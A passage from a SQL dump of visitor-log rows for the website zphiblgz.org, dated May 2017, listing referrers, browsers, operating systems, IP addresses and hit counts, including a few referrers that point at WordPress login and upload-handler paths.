z.org/','Firefox','Windows','7.0.1','','199.249.223.48','000',1,0),(4913,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.55.231','000',4,0),(4914,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','162.243.166.137','000',2,0),(4915,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','67.215.255.140','000',2,0),(4916,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','104.200.24.17','000',2,0),(4917,'2017-05-24','http://zphiblgz.org','Firefox','Windows','39.0','','195.22.127.227','000',1,0),(4918,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','199.249.224.41','000',2,0),(4919,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','45.76.33.203','000',2,0),(4920,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.29.8.211','000',2,0),(4921,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.29.8.132','000',3,0),(4922,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','89.38.208.57','000',2,0),(4923,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','104.200.20.46','000',2,0),(4924,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','171.25.193.77','000',8,0),(4925,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','176.31.180.157','000',4,0),(4926,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','87.118.116.90','000',1,0),(4927,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','155.4.230.97','000',1,0),(4928,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','109.201.133.100','000',2,0),(4929,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.191.54','000',1,0),(4930,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','85.248.227.165','000',7,0),(4931,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','104.160.21.7','000',3,0),(4932,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','199.249.223.62','000',1,0),(4933,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.170.42.4','000',6,0),(4934,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','5.188.232.10','000',1,0),(4935,'2017-05-24','http://zphiblgz.org/','Firefox','Windows','7.0.1','','178.17.170.164','000',1,0),(4936,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','162.247.72.213','000',2,0),(4937,'2017-05-24','http://zphiblgz.org/','Firefox','Windows','7.0.1','','185.62.188.139','000',1,0),(4938,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','104.238.169.105','000',3,0),(4939,'2017-05-24','http://zphiblgz.org/','Firefox','Windows','7.0.1','','67.205.146.164','000',2,0),(4940,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','173.14.173.227','000',3,0),(4941,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','196.54.55.16','000',3,0),(4942,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.255.202.66','000',5,0),(4943,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','178.17.171.43','000',2,0),(4944,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','178.20.55.18','000',1,0),(4945,'2017-05-24','http://zphiblgz.org/','Firefox','Windows','7.0.1','','185.129.62.62','000',3,0),(4946,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','173.239.230.125','000',2,0),(4947,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','109.163.234.2','000',5,0),(4948,'2017-05-24','http://zphiblgz.org/','Firefox','Windows','7.0.1','','204.194.29.4','000',1,0),(4949,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','213.32.55.247','000',4,0),(4950,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','178.239.50.48','000',6,0),(4951,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','217.182.74.253','000',2,0),(4952,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','95.211.230.94','000',4,0),(4953,'2017-05-24','http://zphiblgz.org/','Firefox','Windows','7.0.1','','80.141.191.158','000',1,0),(4954,'2017-05-24','http://zphiblgz.org/','Firefox','Windows','7.0.1','','77.247.181.163','000',2,0),(4955,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','198.50.200.131','000',2,0),(4956,'2017-05-24','http://zphiblgz.org/','Firefox','Windows','7.0.1','','199.249.224.44','000',3,0),(4957,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','178.32.53.94','000',2,0),(4958,'2017-05-24','https://www.google.com/','Chrome','Windows','58.0.3029.110','','138.238.231.141','000',3,0),(4959,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','199.87.154.255','000',1,0),(4960,'2017-05-24','http://zphiblgz.org/','Firefox','Windows','7.0.1','','128.52.128.105','000',3,0),(4961,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.53.83','000',6,0),(4962,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','196.54.55.21','000',4,0),(4963,'2017-05-24','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',4,0),(4964,'2017-05-24','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.183','000',2,0),(4965,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','199.249.224.45','000',1,0),(4966,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','198.50.200.140','000',3,0),(4967,'2017-05-24','https://www.google.com/','Chrome','Windows','58.0.3029.110','','166.91.253.18','000',3,0),(4968,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','137.74.169.241','000',2,0),(4969,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','199.249.223.67','000',2,0),(4970,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','192.160.102.165','000',2,0),(4971,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','162.247.72.201','000',2,0),(4972,'2017-05-24','http://zphiblgz.org/','Firefox','Windows','7.0.1','','78.25.21.3','000',1,0),(4973,'2017-05-24','http://zphiblgz.org/','Firefox','Windows','7.0.1','','162.247.73.206','000',1,0),(4974,'2017-05-24','http://zphiblgz.org','Chrome','Windows','58.0.3029.110','','205.222.248.217','000',5,0),(4975,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','144.217.161.119','000',2,0),(4976,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','198.50.159.204','000',2,0),(4977,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','89.38.150.153','000',4,0),(4978,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','158.69.215.7','000',1,0),(4979,'2017-05-24','http://zphiblgz.org/','Firefox','Windows','7.0.1','','170.250.140.52','000',2,0),(4980,'2017-05-24','http://zphiblgz.org','Firefox','Windows','40.1','','183.82.16.128','000',2,0),(4981,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','82.165.100.196','000',2,0),(4982,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','144.217.167.240','000',2,0),(4983,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','151.80.238.152','000',2,0),(4984,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.100.87.82','000',2,0),(4985,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','199.249.223.77','000',1,0),(4986,'2017-05-24','http://zphiblgz.org/','Firefox','Windows','7.0.1','','212.47.246.21','000',2,0),(4987,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','65.19.167.132','000',4,0),(4988,'2017-05-24','https://www.google.com/','Chrome','Windows','58.0.3029.110','','107.181.102.2','000',1,0),(4989,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','93.115.95.205','000',3,0),(4990,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','62.210.115.87','000',2,0),(4991,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','87.118.82.3','000',2,0),(4992,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','64.137.203.36','000',3,0),(4993,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','104.223.123.98','000',1,0),(4994,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','37.218.240.68','000',2,0),(4995,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','104.233.105.41','000',2,0),(4996,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','93.115.95.204','000',2,0),(4997,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','199.249.224.47','000',2,0),(4998,'2017-05-24','http://zphiblgz.org','Python-urllib','Unknown','2.7','','59.63.161.252','000',1,0),(4999,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','37.187.129.166','000',3,0),(5000,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','199.249.223.75','000',2,0),(5001,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.217.50','000',4,0),(5002,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','199.249.224.40','000',2,0),(5003,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','80.244.81.191','000',2,0),(5004,'2017-05-24','http://zphiblgz.org/','Firefox','Windows','7.0.1','','87.118.122.50','000',1,0),(5005,'2017-05-24','http://zphiblgz.org','Unknown','Unknown','Unknown','','192.99.44.141','000',12,0),(5006,'2017-05-24','http://zphiblgz.org','Chrome','Android','45.0.2454.94','','192.99.44.141','000',1,0),(5007,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','162.247.72.202','000',1,0),(5008,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.38.14.171','000',1,0),(5009,'2017-05-24','http://zphiblgz.org','MSIE','Windows','11.0','','176.31.64.186','000',1,0),(5010,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','199.249.223.79','000',1,0),(5011,'2017-05-24','http://zphiblgz.org/','Firefox','Windows','7.0.1','','185.100.86.154','000',1,0),(5012,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','65.19.167.134','000',1,0),(5013,'2017-05-24','http://zphiblgz.org','Chrome','Android','51.0.2704.81','','128.177.161.150','000',4,0),(5014,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','104.206.237.22','000',3,0),(5015,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','94.142.242.84','000',2,0),(5016,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','5.148.165.13','000',3,0),(5017,'2017-05-24','http://zphiblgz.org','Firefox','Windows','40.1','','39.48.50.227','000',2,0),(5018,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','162.247.72.7','000',3,0),(5019,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','178.17.174.10','000',2,0),(5020,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','212.47.239.33','000',6,0),(5021,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.34.33.2','000',2,0),(5022,'2017-05-24','https://www.google.com/','Chrome','iPhone','58.0.3029.113','','74.193.205.74','000',2,0),(5023,'2017-05-24','http://zphiblgz.org/','Firefox','Windows','7.0.1','','91.213.8.236','000',1,0),(5024,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.100.87.173','000',2,0),(5025,'2017-05-24','http://zphiblgz.org/','Firefox','Windows','7.0.1','','51.15.56.110','000',1,0),(5026,'2017-05-24','http://zphiblgz.org','MSIE','Windows','6.0','','89.163.152.135','000',1,0),(5027,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','79.137.79.167','000',3,0),(5028,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.31.161.102','000',2,0),(5029,'2017-05-24','http://zphiblgz.org/','Firefox','Windows','7.0.1','','199.249.223.68','000',1,0),(5030,'2017-05-24','http://zphiblgz.org','oodlebot','Unknown','1.0','','64.13.155.21','000',1,0),(5031,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','5.196.66.162','000',1,0),(5032,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','208.67.1.79','000',2,0),(5033,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','37.218.245.25','000',1,0),(5034,'2017-05-24','http://zphiblgz.org/','Firefox','Windows','7.0.1','','163.172.142.15','000',1,0),(5035,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','24.248.203.49','000',2,0),(5036,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.117.215.9','000',2,0),(5037,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','46.183.221.231','000',2,0),(5038,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','64.137.246.162','000',1,0),(5039,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','95.142.161.63','000',2,0),(5040,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','192.160.102.164','000',2,0),(5041,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','41.206.188.206','000',2,0),(5042,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.56.11','000',4,0),(5043,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','196.54.55.41','000',2,0),(5044,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','108.175.11.230','000',2,0),(5045,'2017-05-24','http://zphiblgz.org','Firefox','Windows','52.0','','185.43.44.96','000',2,0),(5046,'2017-05-24','http://zphiblgz.org','Firefox','Windows','40.1','','203.87.129.131','000',2,0),(5047,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','208.113.166.5','000',2,0),(5048,'2017-05-24','http://zphiblgz.org/','Firefox','Windows','7.0.1','','195.154.217.29','000',1,0),(5049,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','89.187.144.122','000',1,0),(5050,'2017-05-24','http://zphiblgz.org/','Firefox','Windows','7.0.1','','64.137.189.77','000',1,0),(5051,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.100.86.128','000',1,0),(5052,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','204.8.156.142','000',2,0),(5053,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','162.220.246.230','000',1,0),(5054,'2017-05-25','http://zphiblgz.org','Firefox','Windows','7.0.1','','37.220.35.202','000',2,0),(5055,'2017-05-25','http://zphiblgz.org','Firefox','Windows','7.0.1','','192.160.102.169','000',2,0),(5056,'2017-05-25','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.255.33.0','000',2,0),(5057,'2017-05-25','http://zphiblgz.org','Firefox','Windows','7.0.1','','199.249.224.44','000',1,0),(5058,'2017-05-25','http://zphiblgz.org','Firefox','Windows','7.0.1','','149.56.223.241','000',2,0),(5059,'2017-05-25','http://zphiblgz.org','Firefox','Windows','7.0.1','','65.19.167.131','000',1,0),(5060,'2017-05-25','http://zphiblgz.org','Firefox','Windows','7.0.1','','109.201.133.100','000',2,0),(5061,'2017-05-25','http://zphiblgz.org','Firefox','Windows','7.0.1','','79.124.59.202','000',3,0),(5062,'2017-05-25','http://zphiblgz.org','Firefox','Windows','7.0.1','','130.226.169.137','000',2,0),(5063,'2017-05-25','http://zphiblgz.org/','Firefox','Windows','7.0.1','','196.54.55.41','000',3,0),(5064,'2017-05-25','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.53.134','000',2,0),(5065,'2017-05-25','http://zphiblgz.org','Firefox','Windows','7.0.1','','46.165.223.217','000',2,0),(5066,'2017-05-25','http://zphiblgz.org','Firefox','Windows','7.0.1','','93.115.95.205','000',1,0),(5067,'2017-05-25','http://zphiblgz.org/','Firefox','Windows','7.0.1','','185.163.45.41','000',1,0),(5068,'2017-05-25','http://zphiblgz.org','Firefox','Windows','40.1','','210.56.29.124','000',2,0),(5069,'2017-05-25','http://zphiblgz.org','Chrome','Macintosh','42.0.2311.90','','133.130.48.124','000',9,0),(5070,'2017-05-25','http://zphiblgz.org','Firefox','Windows','7.0.1','','5.188.232.10','000',2,0),(5071,'2017-05-25','http://zphiblgz.org','Firefox','Windows','7.0.1','','164.132.51.91','000',3,0),(5072,'2017-05-25','http://zphiblgz.org','Firefox','Windows','7.0.1','','213.32.55.247','000',1,0),(5073,'2017-05-25','http://zphiblgz.org','Firefox','Windows','7.0.1','','176.10.104.243','000',1,0),(5074,'2017-05-25','http://zphiblgz.org','Firefox','Windows','7.0.1','','62.210.129.246','000',1,0),(5075,'2017-05-25','http://zphiblgz.org','Firefox','Windows','7.0.1','','109.163.234.2','000',2,0),(5076,'2017-05-25','http://zphiblgz.org','Firefox','Windows','7.0.1','','193.70.95.180','000',2,0),(5077,'2017-05-25','http://zphiblgz.org','Firefox','Windows','7.0.1','','64.137.222.241','000',1,0),(5078,'2017-05-25','http://zphiblgz.org/','Firefox','Windows','7.0.1','','94.142.242.84','000',1,0),(5079,'2017-05-25','http://zphiblgz.org','Firefox','Windows','7.0.1','','178.17.171.40','000',1,0),(5080,'2017-05-25','http://zphiblgz.org','Firefox','Windows','7.0.1','','212.47.229.5','000',2,0),(5081,'2017-05-25','http://zphiblgz.org','Firefox','Windows','7.0.1','','78.109.23.1','000',1,0),(5082,'2017-05-25','http://zphiblgz.org/','Firefox','Windows','7.0.1','','46.183.218.199','000',1,0),(5083,'2017-05-25','http://zphiblgz.org','Firefox','Windows','7.0.1','','85.25.103.69','000',2,0),(5084,'2017-05-25','http://zphiblgz.org','Firefox','Windows','7.0.1','','162.247.73.206','000',1,0),(5085,'2017-05-25','http://zphiblgz.org','Firefox','Windows','7.0.1','','104.233.105.41','000',2,0),(5086,'2017-05-25','http://zphiblgz.org','Firefox','Windows','7.0.1','','85.248.227.165','000',2,0),(5087,'2017-05-25','http://zphiblgz.org','Firefox','Windows','7.0.1','','198.50.200.140','000',2,0),(5088,'2017-05-25','http://zphiblgz.org','Firefox','Windows','7.0.1','','79.172.193.32','000',1,0),(5089,'2017-05-25','http://zphiblgz.org/','Firefox','Windows','7.0.1','','93.115.95.204','000',1,0),(5090,'2017-05-25','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.67.180','000',2,0),(5091,'2017-05-25','http://zphiblgz.org','Firefox','Windows','7.0.1','','37.187.129.166','000',2,0),(5092,'2017-05-25','http://zphiblgz.org','Firefox','Windows','7.0.1','','89.38.150.153','000',2,0),(5093,'2017-05-25','http://zphiblgz.org','Firefox','Windows','7.0.1','','77.247.181.165','000',2,0),(5094,'2017-05-25','http://zphiblgz.org','Firefox','Windows','7.0.1','','193.90.12.87','000',1,0),(5095,'2017-05-25','http://zphiblgz.org/','Firefox','Windows','7.0.1','','171.25.193.78','000',1,0),(5096,'2017-05-25','http://zphiblgz.org','Firefox','Windows','7.0.1','','91.219.237.229','000',1,0),(5097,'2017-05-25','http://zphiblgz.org/','Firefox','Windows','7.0.1','','46.101.139.248','000',1,0),(5098,'2017-05-25','http://zphiblgz.org','Firefox','Windows','7.0.1','','193.90.12.90','000',2,0),(5099,'2017-05-25','http://zphiblgz.org','Firefox','Windows','40.1','','82.244.152.19','000',2,0),(5100,'2017-05-25','http://zphiblgz.org','Firefox','Windows','7.0.1','','95.130.11.147','000',2,0),(5101,'2017-05-25','http://zphiblgz.org','Firefox','Windows','40.1','','175.137.9.59','000',2,0),(5102,'2017-05-25','http://zphiblgz.org','Firefox','Windows','40.1','','49.148.174.43','000',2,0),(5103,'2017-05-25','https://www.google.com/','Firefox','Windows','52.0','','8.44.100.11','000',1,0),(5104,'2017-05-25','http://zphiblgz.org','Firefox','Windows','40.1','','49.146.126.83','000',2,0),(5105,'2017-05-25','http://zphiblgz.org','Firefox','Windows','40.1','','157.51.50.76','000',2,0),(5106,'2017-05-25','http://zphiblgz.org','MSIE','Windows','11.0','','23.229.104.238','000',2,0),(5107,'2017-05-25','http://zphiblgz.org/download/constitution-by-laws/','MSIE','Windows','11.0','','94.177.236.243','000',1,0),(5108,'2017-05-25','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',4,0),(5109,'2017-05-25','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.184','000',1,0),(5110,'2017-05-25','http://zphiblgz.org','Unknown','Unknown','Unknown','','169.54.233.117','000',6,0),(5111,'2017-05-25','https://www.google.com/','Chrome','Windows','58.0.3029.110','','100.15.150.202','000',2,0),(5112,'2017-05-25','http://zphiblgz.org','Firefox','Windows','34.0','','185.129.148.181','000',1,0),(5113,'2017-05-25','https://baltimore.craigslist.org/apa/6126992194.html','Chrome','iPhone','58.0.3029.113','','173.69.148.18','000',1,0),(5114,'2017-05-25','http://zphiblgz.org','Firefox','Windows','40.1','','189.24.218.101','000',2,0),(5115,'2017-05-25','https://www.google.com/','Chrome','Windows','58.0.3029.110','','68.134.119.28','000',6,0),(5116,'2017-05-25','https://www.google.com/','Chrome','Android','51.0.2704.106','','172.58.184.150','000',28,0),(5117,'2017-05-26','https://www.google.com/','Safari','iPhone','10.0','','23.122.151.107','000',1,0),(5118,'2017-05-26','http://zphiblgz.org','Firefox','Windows','40.1','','186.242.218.3','000',2,0),(5119,'2017-05-26','http://zphiblgz.org','Unknown','Unknown','Unknown','','168.1.128.38','000',1,0),(5120,'2017-05-26','http://zphiblgz.org/wp-login.php','Firefox','Windows','46.0','','14.185.241.17','000',1,0),(5121,'2017-05-26','http://zphiblgz.org','Firefox','Windows','34.0','','185.129.148.181','000',1,0),(5122,'2017-05-26','http://zphiblgz.org','Firefox','Windows','40.1','','176.123.216.40','000',2,0),(5123,'2017-05-26','http://zphiblgz.org','Firefox','Windows','14.0.1','','5.9.94.207','000',1,0),(5124,'2017-05-26','http://zphiblgz.org','Firefox','Windows','40.1','','62.28.8.82','000',2,0),(5125,'2017-05-26','http://zphiblgz.org','Opera Next','Windows','36.0.2130.32','','178.137.83.166','000',7,0),(5126,'2017-05-26','http://zphiblgz.org','Chrome','Linux','50.0.2661.75','','66.148.121.112','000',1,0),(5127,'2017-05-26','http://www.zphibmaryland.org/chapters/','Chrome','Windows','58.0.3029.110','','136.244.17.168','000',3,0),(5128,'2017-05-26','http://zphiblgz.org/membership/trackback/','Firefox','Linux','3.0.2','','31.132.4.146','000',1,0),(5129,'2017-05-26','http://zphiblgz.org','Firefox','Windows','40.1','','177.65.194.84','000',2,0),(5130,'2017-05-26','http://zphiblgz.org','Chrome','Windows','58.0.3029.110','','95.213.184.251','000',3,0),(5131,'2017-05-26','https://www.google.com/','Chrome','Android','51.0.2704.106','','98.218.61.5','000',2,0),(5132,'2017-05-26','http://zphiblgz.org','Firefox','Windows','40.1','','82.227.228.11','000',2,0),(5133,'2017-05-26','http://zphiblgz.org','Chrome','Android','41.0.2272.96','','54.236.1.13','000',1,0),(5134,'2017-05-26','http://zphiblgz.org/wp-content/themes/organizer/lib_upload/server/php/','Chrome','Windows','42.0.2311.152','','216.244.85.106','000',1,0),(5135,'2017-05-26','http://zphiblgz.org','Firefox','Windows','40.1','','115.97.52.132','000',2,0),(5136,'2017-05-26','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',2,0),(5137,'2017-05-26','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.184','000',1,0),(5138,'2017-05-26','http://zphiblgz.org','Unknown','Unknown','Unknown','','85.143.223.148','000',2,0),(5139,'2017-05-26','http://zphiblgz.org','Chrome','Macintosh','44.0.2403.89','','54.202.160.48','000',2,0),(5140,'2017-05-26','http://zphiblgz.org','Firefox','Windows','40.1','','41.140.15.65','000',2,0),(5141,'2017-05-27','http://zphiblgz.org','Unknown','Unknown','Unknown','','212.158.163.132','000',2,0),(5142,'2017-05-27','http://zphiblgz.org','AppleWebKit','Windows','534','','199.30.24.19','000',1,0),(5143,'2017-05-27','http://zphiblgz.org','Firefox','Windows','38.0','','195.22.127.195','000',1,0),(5144,'2017-05-27','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','93.174.93.80','000',2,0),(5145,'2017-05-27','http://zphiblgz.org','curl','Unknown','7.47.0','','93.174.93.80','000',3,0),(5146,'2017-05-27','http://uptime.com/zphiblgz.org','Unknown','Unknown','Unknown','','199.58.164.126','000',1,0),(5147,'2017-05-27','http://zphiblgz.org','Firefox','Windows','50.0','','92.63.91.108','000',7,0),(5148,'2017-05-27','http://zphiblgz.org/contact/','Firefox','Windows','27.0','','192.171.253.159','000',2,0),(5149,'2017-05-27','http://zphiblgz.org','Unknown','Unknown','Unknown','','93.180.64.220','000',1,0),(5150,'2017-05-27','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',4,0),(5151,'2017-05-27','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.185','000',1,0),(5152,'2017-05-27','http://zphiblgz.org','Firefox','Windows','40.1','','31.223.139.191','000',2,0),(5153,'2017-05-27','http://zphiblgz.org','Firefox','Windows','40.1','','190.160.25.252','000',2,0),(5154,'2017-05-27','https://www.google.com/','Edge','Windows','14.14393','','100.15.156.51','000',3,0),(5155,'2017-05-27','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','5.61.44.59','000',2,0),(5156,'2017-05-27','http://zphiblgz.org','Chrome','Macintosh','49.0.2623.87','','104.129.192.69','000',2,0),(5157,'2017-05-27','http://zphiblgz.org','Unknown','Unknown','Unknown','','138.197.34.177','000',1,0),(5158,'2017-05-28','http://zphiblgz.org','Unknown','Unknown','Unknown','','138.197.34.177','000',3,0),(5159,'2017-05-28','zphiblgz.org','Chrome','Windows','50.0.2661.75','','38.109.218.50','000',2,0),(5160,'2017-05-28','http://zphiblgz.org','Unknown','Unknown','Unknown','','23.88.112.138','000',2,0),(5161,'2017-05-28','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','50.62.8.224','000',1,0),(5162,'2017-05-28','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','200.55.240.84','000',1,0),(5163,'2017-05-28','http://zphiblgz.org/','Opera Next','Windows','43.0.2442.1144','','149.154.67.80','000',1,0),(5164,'2017-05-28','zphiblgz.org','Chrome','Windows','50.0.2661.75','','128.199.159.43','000',2,0),(5165,'2017-05-28','https://www.google.com/','Safari','iPhone','602.1','','173.64.126.44','000',5,0),(5166,'2017-05-28','zphiblgz.org','Chrome','Windows','50.0.2661.75','','36.74.73.255','000',2,0),(5167,'2017-05-28','http://zphiblgz.org/wp-content/themes/core/includes/fileuploader/upload_handler.php','Chrome','Windows','42.0.2311.152','','216.244.85.106','000',1,0),(5168,'2017-05-28','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','5.61.44.59','000',2,0),(5169,'2017-05-28','http://zphiblgz.org','curl','Unknown','7.47.0','','5.61.44.59','000',2,0),(5170,'2017-05-28','https://www.google.com/','Firefox','Linux','53.0','','5.61.44.59','000',3,0),(5171,'2017-05-28','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','145.131.10.179','000',1,0),(5172,'2017-05-28','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.186','000',2,0),(5173,'2017-05-28','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.186','000',1,0),(5174,'2017-05-28','http://zphiblgz.org','Firefox','Windows','40.1','','27.5.118.149','000',2,0),(5175,'2017-05-28','http://zphiblgz.org','Firefox','Windows','40.1','','36.81.76.55','000',2,0),(5176,'2017-05-28','http://zphiblgz.org','Chrome','Macintosh','43.0.2387.1','','104.144.204.110','000',2,0),(5177,'2017-05-28','http://m.facebook.com','AppleWebKit','iPhone','603.1.30','','72.192.255.62','000',1,0),(5178,'2017-05-28','http://zphiblgz.org','Chrome','Windows','10.0.648.204','','198.240.102.89','000',1,0),(5179,'2017-05-28','http://zphiblgz.org','MSIE','Windows','11.0','','69.30.222.130','000',5,0),(5180,'2017-05-29','http://zphiblgz.org','MSIE','Windows','9.0','','204.79.180.113','000',1,0),(5181,'2017-05-29','http://zphiblgz.org','Firefox','Windows','7.0.1','','104.223.123.98','000',1,0),(5182,'2017-05-29','http://zphiblgz.org/','Firefox','Windows','7.0.1','','5.153.233.19','000',1,0),(5183,'2017-05-29','http://zphiblgz.org','Firefox','Windows','40.1','','125.134.190.172','000',1,0),(5184,'2017-05-29','http://zphiblgz.org/logo_img.php','Chrome','Windows','5.0.375.99','','94.177.98.113','000',9,0),(5185,'2017-05-29','http://zphiblgz.org','Firefox','Windows','40.1','','106.160.143.200','000',2,0),(5186,'2017-05-29','https://www.google.com/','Firefox','Windows','53.0','','173.73.18.162','000',1,0),(5187,'2017-05-29','http://zphiblgz.org','Unknown','Unknown','Unknown','','198.204.244.162','000',8,0),(5188,'2017-05-29','http://zphiblgz.org','Firefox','Windows','3.0','','54.197.141.183','000',1,0),(5189,'2017-05-29','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.171','000',4,0),(5190,'2017-05-29','http://www.zphiblgz.org','MSIE','Windows','9.0','','1